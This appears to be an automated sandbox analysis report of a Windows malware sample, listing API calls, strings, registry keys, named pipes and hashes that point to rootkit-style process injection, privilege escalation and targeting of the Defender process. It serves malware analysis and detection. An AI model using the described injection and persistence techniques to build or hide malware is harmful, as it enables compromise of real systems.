Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 572193bf146d3b494bf45c98b2fe352e3418e8d47f1cea54dca98ba0ab49f0be
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: FD518E3AB11A828AEB54DB15F448BB833D1F354F98F158579DA46A77BCD778C881C700

Function 000001FE3A949AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001FE3A949BA7

Strings

RCC, xrefs: 000001FE3A949B77
MOC, xrefs: 000001FE3A949B6F

Memory Dump Source

Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: ef8b09495267377b78a5d01fc467ac5d8c353fbf0b68bf54cf7e2c314a9cc293
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: E8618E36908BC585DB70DB15F4443EABBE4F785B88F044229EB9967BA9CB78C1D0CB00

Analysis Process: dllhost.exePID: 2384, Parent PID: 556COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.2%
Total number of Nodes:	1925
Total number of Limit Nodes:	28

Executed Functions

Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
GetLastError.KERNEL32 ref: 0000000140002E2A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFF
RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2E
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F5E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F70
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F76

Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
Part of subcall function 000000014000200C: HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032
Part of subcall function 000000014000200C: OpenProcess.KERNEL32 ref: 0000000140002079
Part of subcall function 000000014000200C: TerminateProcess.KERNEL32 ref: 000000014000208C
Part of subcall function 000000014000200C: CloseHandle.KERNEL32 ref: 0000000140002095
Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32 ref: 00000001400020A5

RegCreateKeyExW.KERNELBASE ref: 0000000140002FB2
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FD9
RegSetKeySecurity.KERNELBASE ref: 0000000140002FF2
LocalFree.KERNEL32 ref: 0000000140002FFC
RegCreateKeyExW.KERNELBASE ref: 0000000140003032
GetCurrentProcessId.KERNEL32 ref: 000000014000303C
RegSetValueExW.KERNELBASE ref: 0000000140003063
RegCloseKey.KERNELBASE ref: 000000014000306D
RegCloseKey.ADVAPI32 ref: 0000000140003077
CreateThread.KERNELBASE ref: 0000000140003098
GetProcessHeap.KERNEL32 ref: 000000014000309E
HeapAlloc.KERNEL32 ref: 00000001400030AD
CreateThread.KERNELBASE ref: 00000001400030DB
CreateThread.KERNELBASE ref: 00000001400030FC
ShellExecuteW.SHELL32 ref: 0000000140003136
GetProcessHeap.KERNEL32 ref: 0000000140003196
HeapFree.KERNEL32 ref: 00000001400031A4
SleepEx.KERNELBASE ref: 00000001400031AD

Strings

ntdll.dll, xrefs: 0000000140002D8D
kernel32.dll, xrefs: 0000000140002D99
$rbx-dll32, xrefs: 0000000140002E7A, 0000000140002F09
SOFTWARE\$rbx-config, xrefs: 0000000140002F91
?, xrefs: 0000000140003026
$rbx-dll64, xrefs: 0000000140002EAA, 0000000140002F43
SeDebugPrivilege, xrefs: 0000000140002DDF
SOFTWARE, xrefs: 0000000140002E52
svc64, xrefs: 0000000140003046
open, xrefs: 0000000140003117
pid, xrefs: 000000014000300F
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002FD2
Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d, xrefs: 0000000140002D5E

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 2725631067-1382791509
Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNELBASE ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

MsMpEng.exe, xrefs: 00000001400019C1
ReflectiveDllMain, xrefs: 0000000140001BA1
@, xrefs: 0000000140001C08
MSBuild.exe, xrefs: 00000001400019D4

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
registrymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 000000014000327C

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNELBASE ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

RegOpenKeyExW.ADVAPI32 ref: 000000014000330D
RegDeleteValueW.ADVAPI32 ref: 0000000140003325
RegDeleteValueW.ADVAPI32 ref: 0000000140003339
RegDeleteValueW.ADVAPI32 ref: 000000014000334D
ExitProcess.KERNEL32 ref: 0000000140003384
GetProcessHeap.KERNEL32 ref: 000000014000338B
HeapAlloc.KERNEL32 ref: 000000014000339E
K32EnumProcesses.KERNEL32 ref: 00000001400033BB
ExitProcess.KERNEL32 ref: 0000000140003479

Strings

$rbx-dll32, xrefs: 0000000140003332
$rbx-svc32, xrefs: 0000000140003353
$rbx-stager, xrefs: 000000014000331E
$rbx-dll64, xrefs: 0000000140003346
open, xrefs: 000000014000357B
$rbx-svc64, xrefs: 000000014000335F
SOFTWARE, xrefs: 00000001400032FF

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
API String ID: 4225498131-1538754800
Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
HeapFree.KERNEL32 ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

C:\Windows\System32\, xrefs: 0000000140002A2F
.text, xrefs: 0000000140002B54

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 000000014000374D
ConnectNamedPipe.KERNELBASE ref: 000000014000375A
ReadFile.KERNELBASE ref: 000000014000377D
WriteFile.KERNEL32 ref: 00000001400037AB
Sleep.KERNEL32 ref: 00000001400037B8
DisconnectNamedPipe.KERNELBASE ref: 00000001400037C1

Strings

M, xrefs: 000000014000379E
\\.\pipe\$rbx-childproc, xrefs: 0000000140003735

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$rbx-childproc
API String ID: 2203880229-2840927681
Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$rbx-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$rbx-control
API String ID: 2071455217-3647231676
Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003683
HeapAlloc.KERNEL32 ref: 0000000140003697
GetProcessHeap.KERNEL32 ref: 00000001400036A0
HeapAlloc.KERNEL32 ref: 00000001400036AE
K32EnumProcesses.KERNEL32 ref: 00000001400036C9
SleepEx.KERNELBASE ref: 000000014000371E

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: HeapFree.KERNEL32 ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
